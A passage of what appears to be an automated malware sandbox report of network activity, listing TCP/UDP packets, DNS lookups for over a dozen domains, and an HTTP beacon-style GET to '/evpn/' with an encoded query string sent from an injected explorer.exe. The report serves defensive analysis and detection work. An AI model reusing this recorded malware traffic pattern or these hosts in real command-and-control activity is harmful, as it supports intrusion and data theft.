                                                                        Apr 8, 2021 11:11:04.162039042 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.175038099 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:04.175199032 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.175527096 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.188569069 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:04.291693926 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:04.291786909 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:04.292001963 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.292043924 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.304799080 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:09.483736038 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.627065897 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:09.627285957 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.627645969 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.770426035 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:09.776088953 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:09.776129007 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:09.776395082 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.776560068 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.919728994 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:14.827440977 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.839907885 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:14.840024948 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.840365887 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.852629900 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:14.966414928 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:14.966480970 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:14.966608047 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.966674089 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.979166031 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:20.032197952 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.049751997 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:20.052408934 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.052567959 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.070154905 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:20.070189953 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:20.070207119 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:20.070336103 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.070403099 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.087739944 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:25.081486940 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.228672981 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.228780985 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.228843927 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.376015902 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.415476084 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.415529013 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.415555954 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.415611029 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.415680885 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.415733099 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.466644049 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.466720104 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.562701941 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:30.425491095 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.437556982 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.437642097 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.437684059 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.450519085 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573548079 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573568106 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573580027 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573599100 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573612928 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573626995 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573640108 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573669910 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.573761940 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.573805094 CEST4974980192.168.2.323.227.38.74

                                                                        UDP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 11:09:08.994635105 CEST5062053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:09.007450104 CEST53506208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:09.030910015 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:09.049840927 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:09.779433966 CEST6015253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:09.792165995 CEST53601528.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:10.722485065 CEST5754453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:10.735063076 CEST53575448.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:11.652503014 CEST5598453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:11.664969921 CEST53559848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:13.127620935 CEST6418553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:13.140589952 CEST53641858.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:14.791832924 CEST6511053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:14.806005001 CEST53651108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:16.096054077 CEST5836153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:16.108714104 CEST53583618.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:17.170089960 CEST6349253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:17.182909966 CEST53634928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:17.993604898 CEST6083153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:18.006170988 CEST53608318.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:19.216720104 CEST6010053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:19.229356050 CEST53601008.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:20.335616112 CEST5319553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:20.348098040 CEST53531958.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:24.950217009 CEST5014153192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:24.963923931 CEST53501418.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:26.805066109 CEST5302353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:26.817224026 CEST53530238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:27.839957952 CEST4956353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:27.852511883 CEST53495638.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:40.022869110 CEST5135253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:40.035638094 CEST53513528.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:41.138885021 CEST5934953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:41.150847912 CEST53593498.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:43.656533957 CEST5708453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:43.694569111 CEST53570848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:46.410795927 CEST5882353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:46.423384905 CEST53588238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:09:47.295176029 CEST5756853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:09:47.307598114 CEST53575688.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:00.055316925 CEST5054053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:00.211360931 CEST53505408.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:01.802232981 CEST5436653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:01.815247059 CEST53543668.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:04.306127071 CEST5303453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:04.324557066 CEST53530348.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:05.594171047 CEST5776253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:05.924069881 CEST53577628.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:11.107856989 CEST5543553192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:11.175832033 CEST53554358.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:16.987714052 CEST5071353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:17.028974056 CEST53507138.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:21.233629942 CEST5613253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:21.259367943 CEST53561328.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:22.579443932 CEST5898753192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:22.699301958 CEST53589878.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:23.580167055 CEST5657953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:23.599790096 CEST53565798.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:27.944003105 CEST6063353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:28.052412033 CEST53606338.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:38.329937935 CEST6129253192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:38.376888037 CEST53612928.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:43.618215084 CEST6361953192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:43.652030945 CEST53636198.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:48.718440056 CEST6493853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:48.759172916 CEST53649388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:53.839416027 CEST6194653192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:53.887645006 CEST53619468.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:56.644263983 CEST6491053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:56.656802893 CEST53649108.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:58.730592966 CEST5212353192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:58.763911963 CEST53521238.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:10:58.942035913 CEST5613053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:10:59.049151897 CEST53561308.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:04.120409966 CEST5633853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:04.159924030 CEST53563388.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:09.325669050 CEST5942053192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:09.481863976 CEST53594208.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:14.792407036 CEST5878453192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:14.825829983 CEST53587848.8.8.8192.168.2.3
                                                                        Apr 8, 2021 11:11:19.976470947 CEST6397853192.168.2.38.8.8.8
                                                                        Apr 8, 2021 11:11:20.030536890 CEST53639788.8.8.8192.168.2.3

                                                                        DNS Queries

                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                        Apr 8, 2021 11:10:00.055316925 CEST192.168.2.38.8.8.80x82cStandard query (0)www.jamessicilia.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:05.594171047 CEST192.168.2.38.8.8.80xcf2cStandard query (0)www.kinfet.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:11.107856989 CEST192.168.2.38.8.8.80x693aStandard query (0)www.productsoffholland.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:16.987714052 CEST192.168.2.38.8.8.80x70f8Standard query (0)www.markmalls.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.579443932 CEST192.168.2.38.8.8.80x4a6bStandard query (0)www.zhuledao.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:27.944003105 CEST192.168.2.38.8.8.80x2af8Standard query (0)www.jcernadas.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.329937935 CEST192.168.2.38.8.8.80xd7fcStandard query (0)www.theholisticbirthco.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:43.618215084 CEST192.168.2.38.8.8.80xf91fStandard query (0)www.glgshopbd.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:48.718440056 CEST192.168.2.38.8.8.80x437aStandard query (0)www.tor-one.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:53.839416027 CEST192.168.2.38.8.8.80xa308Standard query (0)www.de-knutselkeet.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:58.942035913 CEST192.168.2.38.8.8.80xb165Standard query (0)www.autotrafficbot.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:04.120409966 CEST192.168.2.38.8.8.80xda3dStandard query (0)www.curiosityisthecurebook.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:09.325669050 CEST192.168.2.38.8.8.80xb04Standard query (0)www.usinggroovefunnels.comA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:14.792407036 CEST192.168.2.38.8.8.80x8358Standard query (0)www.cgpizza.netA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:19.976470947 CEST192.168.2.38.8.8.80x3223Standard query (0)www.physicalrobot.comA (IP address)IN (0x0001)

                                                                        DNS Answers

                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                        Apr 8, 2021 11:10:00.211360931 CEST8.8.8.8192.168.2.30x82cNo error (0)www.jamessicilia.com208.91.197.91A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:05.924069881 CEST8.8.8.8192.168.2.30xcf2cNo error (0)www.kinfet.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:10:05.924069881 CEST8.8.8.8192.168.2.30xcf2cNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:11.175832033 CEST8.8.8.8192.168.2.30x693aNo error (0)www.productsoffholland.comproductsoffholland.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:10:11.175832033 CEST8.8.8.8192.168.2.30x693aNo error (0)productsoffholland.com45.82.188.40A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:17.028974056 CEST8.8.8.8192.168.2.30x70f8No error (0)www.markmalls.com35.240.239.44A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST8.8.8.8192.168.2.30x4a6bNo error (0)www.zhuledao.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST8.8.8.8192.168.2.30x4a6bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com52.15.160.167A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST8.8.8.8192.168.2.30x4a6bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.13.255.157A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST8.8.8.8192.168.2.30x4a6bNo error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.14.206.30A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:28.052412033 CEST8.8.8.8192.168.2.30x2af8No error (0)www.jcernadas.com52.216.152.43A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)www.theholisticbirthco.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST8.8.8.8192.168.2.30xd7fcNo error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:43.652030945 CEST8.8.8.8192.168.2.30xf91fServer failure (2)www.glgshopbd.comnonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:48.759172916 CEST8.8.8.8192.168.2.30x437aNo error (0)www.tor-one.com80.67.16.8A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:53.887645006 CEST8.8.8.8192.168.2.30xa308No error (0)www.de-knutselkeet.com188.93.150.75A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:10:59.049151897 CEST8.8.8.8192.168.2.30xb165No error (0)www.autotrafficbot.com45.88.202.115A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:04.159924030 CEST8.8.8.8192.168.2.30xda3dNo error (0)www.curiosityisthecurebook.comcuriosityisthecurebook.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:11:04.159924030 CEST8.8.8.8192.168.2.30xda3dNo error (0)curiosityisthecurebook.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:09.481863976 CEST8.8.8.8192.168.2.30xb04No error (0)www.usinggroovefunnels.comusinggroovefunnels.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:11:09.481863976 CEST8.8.8.8192.168.2.30xb04No error (0)usinggroovefunnels.com192.185.48.194A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:14.825829983 CEST8.8.8.8192.168.2.30x8358No error (0)www.cgpizza.netcgpizza.netCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 11:11:14.825829983 CEST8.8.8.8192.168.2.30x8358No error (0)cgpizza.net34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 11:11:20.030536890 CEST8.8.8.8192.168.2.30x3223No error (0)www.physicalrobot.com52.58.78.16A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.jamessicilia.com
                                                                        • www.kinfet.com
                                                                        • www.productsoffholland.com
                                                                        • www.markmalls.com
                                                                        • www.zhuledao.com
                                                                        • www.jcernadas.com
                                                                        • www.theholisticbirthco.com
                                                                        • www.tor-one.com
                                                                        • www.de-knutselkeet.com
                                                                        • www.autotrafficbot.com
                                                                        • www.curiosityisthecurebook.com
                                                                        • www.usinggroovefunnels.com
                                                                        • www.cgpizza.net
                                                                        • www.physicalrobot.com

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.349724208.91.197.9180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 11:10:00.365288973 CEST1369OUTGET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jamessicilia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:00.582693100 CEST1370INHTTP/1.1 200 OK
                                                                        Date: Thu, 08 Apr 2021 09:10:00 GMT
                                                                        Server: Apache
                                                                        Set-Cookie: vsid=926vr3654186005020546; expires=Tue, 07-Apr-2026 09:10:00 GMT; Max-Age=157680000; path=/; domain=www.jamessicilia.com; HttpOnly
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ==
                                                                        Content-Length: 2559
                                                                        Keep-Alive: timeout=5, max=84
                                                                        Connection: Keep-Alive
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6a 61 6d 65 73 73 69 63 69 6c 69 61 2e 63 6f 6d 2f 3f 66 70 3d 63 73 4d 6d 56 73 25 32 46 25 32 42 4b 76 48 4e 34 52 50 72 64 6f 35 79 55 4e 75 25 32 46 61 4e 62 74 78 64 4a 63 69 53 5a 43 4d 69 7a 69 4a 49 31 52 7a 61 46 45 68 49 34 5a 35 65 52 6d 76 6a 31 4a 56 43 66 49 35 78 63 64 4a 61 47 44 58 6f 43 33 59 67 62 46 75 6a 7a 45 4c 6b 6d 42 67 56 25 32 46 76 67 63 71 79 45 63 56 75 4d 44 62 34 33 4e 55 31 4b 4e 5a 6e 6a 4f 6a 74 36 79 53 36 79 4c 32 4e 51 43 52 42 38 64 62 4a 79 53 51 4f 63 6f 79 4f 6d 33 4c 67 25 32 42 76 32 79 39 64 48 6a 58 43 78 55 51 58 50 38 36 59 44 70 51 52 6f 67 50 34 59 25 33 44 26 70 72 76 74 6f 66 3d 64 63 61 55 6f 53 4c 31 51 4d 30 36 6e 38 53 54 37 72 63 49 46 79 54 61 68 68 55 43 36 31 72 4b 57 32 67 63 76 66 55 76 47 48 34 25 33 44 26 70 6f 72 75 3d 34 50 48 48 73 33 34 44 6a 53 67 7a 6a 66 31 41 76 78 73 74 30 36 4c 30 25 32 42 62 36 76 39 44 72 48 74 61 33 42 68 67 58 39 41 43 30 56 39 4a 44 54 33 74 58 52 6b 67 67 53 44 52 65 53 72 61 6c 38 58 62 77 37 35 5a 76 37 76 74 43 33 37 66 45 4e 62 45 6e 4a 25 32 46 37 58 6e 42 63 4c 76 68 33 77 62 6a 76 62 61 72 37 61 30 57 25 32 46 37 77 6e 66 62 45 62 41 50 57 6a 6c 51 66 74 5a 6c 6b 76 25 32 42 76 51 7a 43 42 77 46 6a 4a 6c 33 37 69 63 37 75 48 34 56 25 32 46 66 74 70 5a 43 49 39 4c 65 65 41 4d 55 6a 47 25 32 42 6a 4e 6f 67 71 6d 71 65 4a 6d 76 39 4b 6f 53 48 30 4a 25 32 46 4d 68 6a 50 36 65 63 75 6f 33 4d 26 63 69 66 72 3d 31 26 4a 44 4b 38 69 78 3d 66 68 72 5a 42 6a 78 61 49 30 57 44 72 4f 4d 4d 4c 42 39 69 25 32 46 65 54 63 72 58 72 51 78 75 67 78 2b 6a 67 6f 6a 6d 37 42 41 64 36 66 42 65 36 34 4a 69 4f 57 6c 69 53 43 7a 66 55 6a 50 69 72 4a 7a 4a 43 6d 26 77 34 3d 6a 46 4e 70 33 36 49 68 75 22 3b 0d 0a 09 2f 2a 0d 0a 2d 2d 3e 0d 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41
                                                                        Data Ascii: ...top.location="http://www.jamessicilia.com/?fp=csMmVs%2F%2BKvHN4RPrdo5yUNu%2FaNbtxdJciSZCMiziJI1RzaFEhI4Z5eRmvj1JVCfI5xcdJaGDXoC3YgbFujzELkmBgV%2FvgcqyEcVuMDb43NU1KNZnjOjt6yS6yL2NQCRB8dbJySQOcoyOm3Lg%2Bv2y9dHjXCxUQXP86YDpQRogP4Y%3D&prvtof=dcaUoSL1QM06n8ST7rcIFyTahhUC61rKW2gcvfUvGH4%3D&poru=4PHHs34DjSgzjf1Avxst06L0%2Bb6v9DrHta3BhgX9AC0V9JDT3tXRkggSDReSral8Xbw75Zv7vtC37fENbEnJ%2F7XnBcLvh3wbjvbar7a0W%2F7wnfbEbAPWjlQftZlkv%2BvQzCBwFjJl37ic7uH4V%2FftpZCI9LeeAMUjG%2BjNogqmqeJmv9KoSH0J%2FMhjP6ecuo3M&cifr=1&JDK8ix=fhrZBjxaI0WDrOMMLB9i%2FeTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu";/*--><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEA
                                                                        Apr 8, 2021 11:10:00.582726002 CEST1372INData Raw: 41 51 3d 3d 5f 52 75 31 66 44 38 32 2f 59 71 73 2b 33 5a 79 65 37 64 74 58 55 5a 2f 6f 4a 69 44 77 32 75 31 4f 78 50 67 48 4d 38 78 43 79 4c 59 79 57 61 54 4d 47 43 57 51 69 64 7a 4d 2b 41 38 36 4c 37 6f 73 37 75 48 70 6b 64 36 4a 34 42 4c 6d 73
                                                                        Data Ascii: AQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ=="><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta name="viewport" content="width=device-width"><meta ht
                                                                        Apr 8, 2021 11:10:00.582946062 CEST1372INData Raw: 32 42 76 32 79 39 64 48 6a 58 43 78 55 51 58 50 38 36 59 44 70 51 52 6f 67 50 34 59 25 33 44 26 70 72 76 74 6f 66 3d 64 6a 46 41 38 68 64 59 64 78 56 52 37 64 72 25 32 42 34 71 51 36 41 69 25 32 42 4b 7a 44 43 4a 53 61 4a 50 75 50 7a 79 4c 4f 6e
                                                                        Data Ascii: 2Bv2y9dHjXCxUQXP86YDpQRogP4Y%3D&prvtof=djFA8hdYdxVR7dr%2B4qQ6Ai%2BKzDCJSaJPuPzyLOnSIM4%3D&poru=oAQe3Y1XSeo0UqllFwmgg%2Fdjf2BSR1FA%2FyNyqCDOXzNfh5I7wYiIimAj25fYJnMumUpgfO%2FGXlEYFXrLrHKCsGrABIHQIGEWpjl4cTQ090eA2rSpviTChWkMxz0D1I5PfX5NRj2gdLxkEY
